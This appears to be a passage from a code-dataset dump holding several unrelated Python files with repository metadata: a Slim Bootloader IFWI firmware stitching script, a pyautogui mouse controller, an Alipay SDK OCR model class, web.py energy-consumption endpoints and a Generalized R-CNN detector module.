port re import sys import struct import argparse import zipfile import shutil from ctypes import * from subprocess import check_output from functools import reduce sys.dont_write_bytecode = True sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')) if not os.path.exists (sblopen_dir): sblopen_dir = os.getenv('SBL_SOURCE', '') sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools')) try: from IfwiUtility import * except ImportError: err_msg = "Cannot find IfwiUtility module!\n" err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder." raise ImportError(err_msg) extra_usage_txt = \ """This script creates a new Apollo Lake Slim Bootloader IFWI image basing on an existing IFWI base image. Please note, this stitching method will work only if Boot Guard in the base image is not enabled, and the silicon is not fused with Boot Guard enabled. Please follow steps below: 1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform, such as MinnowBoard 3, LeafHill, etc. The URL is below: https://firmware.intel.com/projects/minnowboard3 Alternatively, the original IFWI image from the onboard SPI flash can be read out as the base image too. 2. Build Slim Bootloader source tree and generate a stitching ZIP package. The generated ZIP package is located at: $(WORKSPACE)/Outputs/apl/Stitch_Components.zip 3. Stitch to create a new IFWI image. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s Stitch_Components.zip -o SlimBoot.bin 4. Optionally, to view the flash layout for an given IFWI image, specify '-i' option only. 
EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin """ FILE_ALIGN = 0x1000 class IFWI_MANIPULATE: def add_component (self, root, path, before = '$', file_path = ''): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only add FILE type !') return -2 index = None if before == '$': index = len(dir_comp.child) elif before == '^': index = 0 else: for idx, file in enumerate(dir_comp.child): if before == file.name: index = idx if index is None: print ('Cannot find FILE %s !' % before) return -3 else: length = os.path.getsize(file_path) if file_path else 0x1000 comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length) comp.set_data (file_path) dir_comp.add_child (comp, index) return 0 def remove_component (self, root, path): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only replace FILE type !') return -2 index = None for idx, file in enumerate(dir_comp.child): if file.name == nodes[-1]: index = idx break if index is None: print ('Cannot find FILE %s !' % path) return -3 else: del dir_comp.child[index] return 0 def replace_component (self, root, path, file_path): comp = IFWI_PARSER.locate_component (root, path) if not comp: print ('Cannot find FILE %s !' % path) return -1 if comp.type != COMPONENT.COMP_TYPE['FILE']: print ('Can only replace FILE type !' 
% path) return -2 comp.length = os.path.getsize(file_path) if file_path else 0x1000 if file_path: comp.set_data (file_path) return 0 def copy_component (self, root, path, ifwi_data): print ("COPY BP0 BPDT to BP1 BPDT ...") bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1') bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT') bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT') bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT') bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length]) bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length]) bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data padding = bp1.offset + bp1.length - bp1sbpdt_end_offset if padding < 0: print ('Insufficiant space in BP1 partition !') return -1 ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding offset = bp1bpdt.offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) if "BpdtSbpdt" == str(bpdt_entry.type): bpdt_entry.sub_part_size = bp1sbpdt.length offset += sizeof(BPDT_ENTRY) offset = bp1sbpdt_offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length) offset += sizeof(BPDT_ENTRY) print ("Done!") return 0 def create_dir_data (self, dir, ifwi_data): support_list = ["BpdtIbb", "BpdtObb"] if dir.name not in support_list: raise Exception ('Only %s are supported !' 
% ' '.join(support_list)) adjust = True offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset) dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER)) for idx, comp in enumerate(dir.child): delta = 0 parts = os.path.splitext(comp.name) if len(parts) > 1 and parts[1] in ['.man', '.met']: align = 1 elif comp.name in ['IPAD', 'OPAD']: align = 0x40 else: align = FILE_ALIGN delta = dir.offset & (FILE_ALIGN - 1) next_offset = ((offset + delta + align - 1) & ~(align - 1)) count = next_offset - offset if adjust: adjust = False count -= delta dir_data.extend(b'\xff' * count) comp_data = comp.get_data() if comp_data: dir_data.extend(comp_data) else: dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length]) sub_dir = SUBPART_DIR_ENTRY() sub_dir.entry_name = comp.name.encode() sub_dir.entry_offset = next_offset - delta sub_dir.entry_size = comp.length sub_dir.reserved1 = 0 sub_dir.reserved2 = 0 entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir) next_offset += comp.length offset = next_offset align = FILE_ALIGN next_offset = ((offset + align - 1) & ~(align - 1)) dir_data.extend(b'\xff' * (next_offset - offset)) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data) sub_dir_hdr.num_of_entries = len(dir.child) sub_dir_hdr.checksum = 0 dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sum_buf = (c_uint8 * length).from_buffer_copy(dir_data) sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1) if remaining: dir_data.extend(b'\xff' * (FILE_ALIGN - remaining)) return dir_data def refresh_ifwi_for_dir (self, dir, 
ifwi_data): dir_data = self.create_dir_data (dir, ifwi_data) length = len (dir_data) adjust_length = length - dir.length if (dir.offset + length) & (FILE_ALIGN - 1): print ('DIR total size needs to be 4KB aligned !') org_bpdt_offset = dir.parent.parent.child[0].offset org_sbpdt_offset = dir.parent.parent.child[1].offset old_dir = dir while dir.type != COMPONENT.COMP_TYPE['BP']: for each in dir.parent.child: if each.offset > dir.offset: each.offset += adjust_length dir.length += adjust_length dir = dir.parent dir = old_dir parent = dir.parent bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset) base = parent.offset + sizeof(BPDT_HEADER) found = False for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY)) comps = [x for x in parent.child if x.name == str(bpdt_entry.type)] if len(comps) == 0: continue if len(comps) > 1: raise Exception ('Found duplicated DIR %s !', bpdt_entry.type) bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset if dir.name == str(bpdt_entry.type): bpdt_entry.sub_part_size = length found = True if not found: raise Exception ('Could not find DIR %s !', dir.name) bp_comp = parent.parent if parent.name == 'BPDT': bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) bpdt_entry.sub_part_offset += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') else: bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_bpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) if str(bpdt_entry.type) == "BpdtSbpdt": bpdt_entry.sub_part_size 
+= adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') if adjust_length > 0: ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \ ifwi_data[bp_comp.offset + bp_comp.length:] else: adjust_length = -adjust_length ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \ b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:] return 0 def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'): print ('%s %s ...' % (action, path)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) ifwi_op = IFWI_MANIPULATE() if action == "REMOVE": ret = ifwi_op.remove_component (root, path) elif action == "ADD": ret = ifwi_op.add_component (root, path, before, file_name) elif action == "REPLACE": ret = ifwi_op.replace_component (root, path, file_name) elif action == "COPY": ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data) else: ret = -100 if ret == 0 and path: dir_path = '/'.join(path.split('/')[:-1]) dir = IFWI_PARSER.locate_component (root, dir_path) ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data) print ('done!') return ret def patch_flash_map (image_data, platform_data = 0xffffffff): comp_bpdt_dict = { b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD", b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB", b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD", b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR", b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD", b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR", b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD", b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD", b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH", b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP", b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB", b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB", b'SG1A' : 
"IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL", b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met", } print ("Patching Slim Bootloader Flash Map table ...") output_image_data = image_data ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data) if not ifwi: return -1 pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD']) if not pld: comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD" bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0') bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1') if not bp0 or not bp1: return -2 for part in range(2): path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part) comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if part == 0: raise Exception("Cannot locate %s !" % path) else: continue stage1AOffset = comp.offset stage1ALength = comp.length temp = stage1AOffset + stage1ALength - 8 c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off) entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC) fla_map_str.romsize = bp0.length + bp1.length if part == 1: fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION'] for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) path = comp_bpdt_dict[desc.sig] if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']): path = path.replace("BP0", "BP1") if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']): desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP'] if desc.sig == b'RSVD': desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset continue comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if desc.sig == b'KEYH': continue raise Exception("Cannot locate component '%s' 
in BPDT !" % path) if (desc.size == 0) and (desc.offset == 0): desc.size = comp.length desc.offset = comp.offset - bp0.offset continue if desc.size != comp.length and comp.name != 'FB': raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig]) if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0): raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \ "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset)) desc.offset = comp.offset - bp0.offset if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length): raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig]) limit = bp1.offset + bp1.length - bp0.offset - 0x40000 for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) if desc.sig == b'RSVD': continue if desc.offset >= limit or desc.offset + desc.size > limit: print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part)) print ("Flash map was patched successfully!") return 0 def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir): redundant_payload = True ifwi_data = bytearray (get_file_data (ifwi_in)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) if not root: raise Exception ('Invalid IFWI input image format !') comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType") if not comp: raise Exception ('Unsupported base image format !') data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32] if (data[0] & 0x0F) != 0x00: raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !') print ('Creating %sredundant image ...' 
% ('non-' if non_redundant else '')) remove_list = [ "IFWI/BIOS/BP0/BPDT/BpdtIbb", "IFWI/BIOS/BP1/BPDT/BpdtIbb", "IFWI/BIOS/BP1/SBPDT/BpdtObb" ] for dir_path in remove_list: comp = IFWI_PARSER.locate_component (root, dir_path) if not comp: continue for each in comp.child: if each.name.endswith('.man') or each.name.endswith('.met'): continue ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data) if ret != 0: raise Exception ('REMOVE failed (error code %d) !' % (ret)) if not non_redundant: ret = manipulate_ifwi ('COPY', '', ifwi_data) if ret != 0: raise Exception ('COPY failed (error code %d) !' % (ret)) if stitch_dir: ibb_list = [ ('IBBL' , 'IBBL'), ('IBB' , 'IBBM'), ('OBB' , 'OBB'), ('FWUP' , 'FWU'), ('CFGD' , 'CFGDATA'), ('KEYH' , 'KEYHASH'), ('VAR' , 'VAR'), ('MRCD' , 'MRCDATA'), ('PLD' , 'PLD'), ] obb_list = [ ('FB' , 'FB'), ('EPLD' , 'EPLD'), ('UVAR' , 'UVAR'), ('PLD' , 'PLD'), ] opt_list = [ 'EPLD', 'UVAR' ] if redundant_payload: del obb_list[-1] else: del ibb_list[-1] bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/" loop = 1 if non_redundant else 2 for bp in range(loop): dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp for comp_name, file_name in ibb_list: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) for comp_name, file_name in obb_list: if file_name == '': file_path = '' else: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) if (comp_name in opt_list) and not os.path.exists(file_path): ret = 0 else: ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' 
% (ret)) patch_flash_map (ifwi_data, platform_data) if bios_out: print ('Creating BIOS image ...') bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS') fd = open (bios_out, 'wb') fd.write(ifwi_data[bios.offset:bios.offset+bios.length]) fd.close() print ('Creating IFWI image ...') fd = open (ifwi_out, 'wb') fd.write(ifwi_data) fd.close() print ('Done!') def print_ifwi_layout (ifwi_file): ifwi_parser = IFWI_PARSER () ifwi_bin = bytearray (get_file_data (ifwi_file)) ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin) if ifwi: ifwi_parser.print_tree (ifwi) else: print ('Invalid IFWI image') return 0 if __name__ == '__main__': hexstr = lambda x: int(x, 16) ap = argparse.ArgumentParser() ap.add_argument('-i', '--input-ifwi-file', dest='ifwi_in', type=str, required=True, help='specify input template IFWI image file path') ap.add_argument('-o', '--output-ifwi-file', dest='ifwi_out', type=str, default='', help='specify generated output IFWI image file path') ap.add_argument('-b', '--output-bios-region', dest='bios_out', type=str, default='', help='specify generated output BIOS region image file path') ap.add_argument('-s', '--sitch-zip-file', dest='stitch_in', type=str, default='', help='specify input sitching zip package file path') ap.add_argument('-p', '--platform-data', dest='plat_data', type=hexstr, default=0xFFFFFFFF, help='specify a platform specific data (HEX, DWORD) for customization') ap.add_argument('-n', '--non-redundant', dest='non_redundant', action="store_true", help='specify if the flash layout will be full redundant or not') if len(sys.argv) == 1: print('%s' % extra_usage_txt) args = ap.parse_args() if args.ifwi_out == '' and args.stitch_in == '': print_ifwi_layout (args.ifwi_in) sys.exit (0) else: if args.ifwi_out and args.stitch_in == '': ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None) sys.exit (ret) print ("Unpacking sitching ZIP package ...") output_dir = os.path.dirname(args.ifwi_out) 
stitch_dir = os.path.join(output_dir, 'stitch_comp') if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED) zf.extractall(stitch_dir) zf.close() ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir) if os.path.exists(stitch_dir): shutil.rmtree(stitch_dir) sys.exit (ret)
true
true
f705c96c12e4e0c7f7af29723e12d8fbcdab4c40
907
py
Python
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
1
2020-09-04T06:28:43.000Z
2020-09-04T06:28:43.000Z
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
1
2022-01-13T02:59:41.000Z
2022-01-13T02:59:41.000Z
src/mouse_controller.py
NAITTOU/computer_pointer_controller
b36ce51e7638543b54da1abe56f7ae54eb21918f
[ "MIT" ]
null
null
null
''' This is a sample class that you can use to control the mouse pointer. It uses the pyautogui library. You can set the precision for mouse movement (how much the mouse moves) and the speed (how fast it moves) by changing precision_dict and speed_dict. Calling the move function with the x and y output of the gaze estimation model will move the pointer. This class is provided to help get you started; you can choose whether you want to use it or create your own from scratch. ''' import pyautogui pyautogui.FAILSAFE = False class MouseController: def __init__(self, precision, speed): precision_dict={'high':100, 'low':1000, 'medium':500} speed_dict={'fast':1, 'slow':10, 'medium':5} self.precision=precision_dict[precision] self.speed=speed_dict[speed] def move(self, x, y): pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
43.190476
122
0.732084
import pyautogui pyautogui.FAILSAFE = False class MouseController: def __init__(self, precision, speed): precision_dict={'high':100, 'low':1000, 'medium':500} speed_dict={'fast':1, 'slow':10, 'medium':5} self.precision=precision_dict[precision] self.speed=speed_dict[speed] def move(self, x, y): pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
true
true
f705c9972c508fc15446070fc555ad919151b644
1,253
py
Python
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
213
2018-08-27T16:49:32.000Z
2021-12-29T04:34:12.000Z
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
29
2018-09-29T06:43:00.000Z
2021-09-02T03:27:32.000Z
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
alipay/alipay-sdk-python-all
1b63620431d982d30d39ee0adc4b92463cbcee3c
[ "Apache-2.0" ]
59
2018-08-27T16:59:26.000Z
2022-03-25T10:08:15.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AntOcrVehicleplateIdentifyModel(object): def __init__(self): self._image = None self._type = None @property def image(self): return self._image @image.setter def image(self, value): self._image = value @property def type(self): return self._type @type.setter def type(self, value): self._type = value def to_alipay_dict(self): params = dict() if self.image: if hasattr(self.image, 'to_alipay_dict'): params['image'] = self.image.to_alipay_dict() else: params['image'] = self.image if self.type: if hasattr(self.type, 'to_alipay_dict'): params['type'] = self.type.to_alipay_dict() else: params['type'] = self.type return params @staticmethod def from_alipay_dict(d): if not d: return None o = AntOcrVehicleplateIdentifyModel() if 'image' in d: o.image = d['image'] if 'type' in d: o.type = d['type'] return o
22.375
61
0.545092
import json from alipay.aop.api.constant.ParamConstants import * class AntOcrVehicleplateIdentifyModel(object): def __init__(self): self._image = None self._type = None @property def image(self): return self._image @image.setter def image(self, value): self._image = value @property def type(self): return self._type @type.setter def type(self, value): self._type = value def to_alipay_dict(self): params = dict() if self.image: if hasattr(self.image, 'to_alipay_dict'): params['image'] = self.image.to_alipay_dict() else: params['image'] = self.image if self.type: if hasattr(self.type, 'to_alipay_dict'): params['type'] = self.type.to_alipay_dict() else: params['type'] = self.type return params @staticmethod def from_alipay_dict(d): if not d: return None o = AntOcrVehicleplateIdentifyModel() if 'image' in d: o.image = d['image'] if 'type' in d: o.type = d['type'] return o
true
true
f705ca0b99c4431c3fdc996319aa370d49c274ac
1,827
py
Python
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
newDataAnalytics.py
PeterJWei/EnergyFootprinting
0396efba7d4e6863452e322f9f7561c6cd756478
[ "MIT" ]
null
null
null
import json import web import calendar import datetime import cloudserver urls = ( "/BuildingFootprint/", "BuildingFootprint", "/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated", "/PersonalConsumption/", "PersonalConsumption", "/HistoricalConsumption/", "HistoricalConsumption") class BuildingFootprint: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day else: start = float(raw_time['start']) return cloudserver.db.buildingFootprint(start, end) class BuildingFootprintDisaggregated: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day else: start = float(raw_time['start']) return cloudserver.db.buildingFootprintDisaggregated(start, end) class PersonalConsumption: def GET(self): print("Got to Personal Consumption") raw_data = web.input() end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) if "end" in raw_data: end = float(raw_data['end']) start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day if "start" in raw_data: start = float(raw_data['start']) user = "Peter Wei" if "user" in raw_data: user = raw_data['user'] return cloudserver.db.personalFootprint(user, start, end) class HistoricalConsumption: def GET(self): return cloudserver.db.historicalConsumption() dataExtraction = web.application(urls, locals())
26.478261
85
0.727422
import json import web import calendar import datetime import cloudserver urls = ( "/BuildingFootprint/", "BuildingFootprint", "/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated", "/PersonalConsumption/", "PersonalConsumption", "/HistoricalConsumption/", "HistoricalConsumption") class BuildingFootprint: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 else: start = float(raw_time['start']) return cloudserver.db.buildingFootprint(start, end) class BuildingFootprintDisaggregated: def GET(self): raw_time = web.input() if "end" not in raw_time: end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) else: end = float(raw_time['end']) if "start" not in raw_time: start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 else: start = float(raw_time['start']) return cloudserver.db.buildingFootprintDisaggregated(start, end) class PersonalConsumption: def GET(self): print("Got to Personal Consumption") raw_data = web.input() end = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) if "end" in raw_data: end = float(raw_data['end']) start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 if "start" in raw_data: start = float(raw_data['start']) user = "Peter Wei" if "user" in raw_data: user = raw_data['user'] return cloudserver.db.personalFootprint(user, start, end) class HistoricalConsumption: def GET(self): return cloudserver.db.historicalConsumption() dataExtraction = web.application(urls, locals())
true
true
f705ca2749b113501167b31f27c6bb73734fd6c0
2,235
py
Python
openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. """ Implements the Generalized R-CNN framework """ import torch from torch import nn from openpose.structures.image_list import to_image_list from ..backbone import build_backbone from ..rpn.rpn import build_rpn from ..roi_heads.roi_heads import build_roi_heads class GeneralizedRCNN(nn.Module): """ Main class for Generalized R-CNN. Currently supports boxes and masks. It consists of three main parts: - backbone - rpn - heads: takes the features + the proposals from the RPN and computes detections / masks from it. """ def __init__(self, cfg): super(GeneralizedRCNN, self).__init__() self.backbone = build_backbone(cfg) self.rpn = build_rpn(cfg, self.backbone.out_channels) self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels) def forward(self, images, targets=None): """ Arguments: images (list[Tensor] or ImageList): images to be processed targets (list[BoxList]): ground-truth boxes present in the image (optional) Returns: result (list[BoxList] or dict[Tensor]): the output from the model. During training, it returns a dict[Tensor] which contains the losses. During testing, it returns list[BoxList] contains additional fields like `scores`, `labels` and `mask` (for Mask R-CNN models). """ if self.training and targets is None: raise ValueError("In training mode, targets should be passed") images = to_image_list(images) features = self.backbone(images.tensors) proposals, proposal_losses = self.rpn(images, features, targets) if self.roi_heads: x, result, detector_losses = self.roi_heads(features, proposals, targets) else: # RPN-only models don't have roi_heads x = features result = proposals detector_losses = {} if self.training: losses = {} losses.update(detector_losses) losses.update(proposal_losses) return losses,result return result
34.384615
87
0.644295
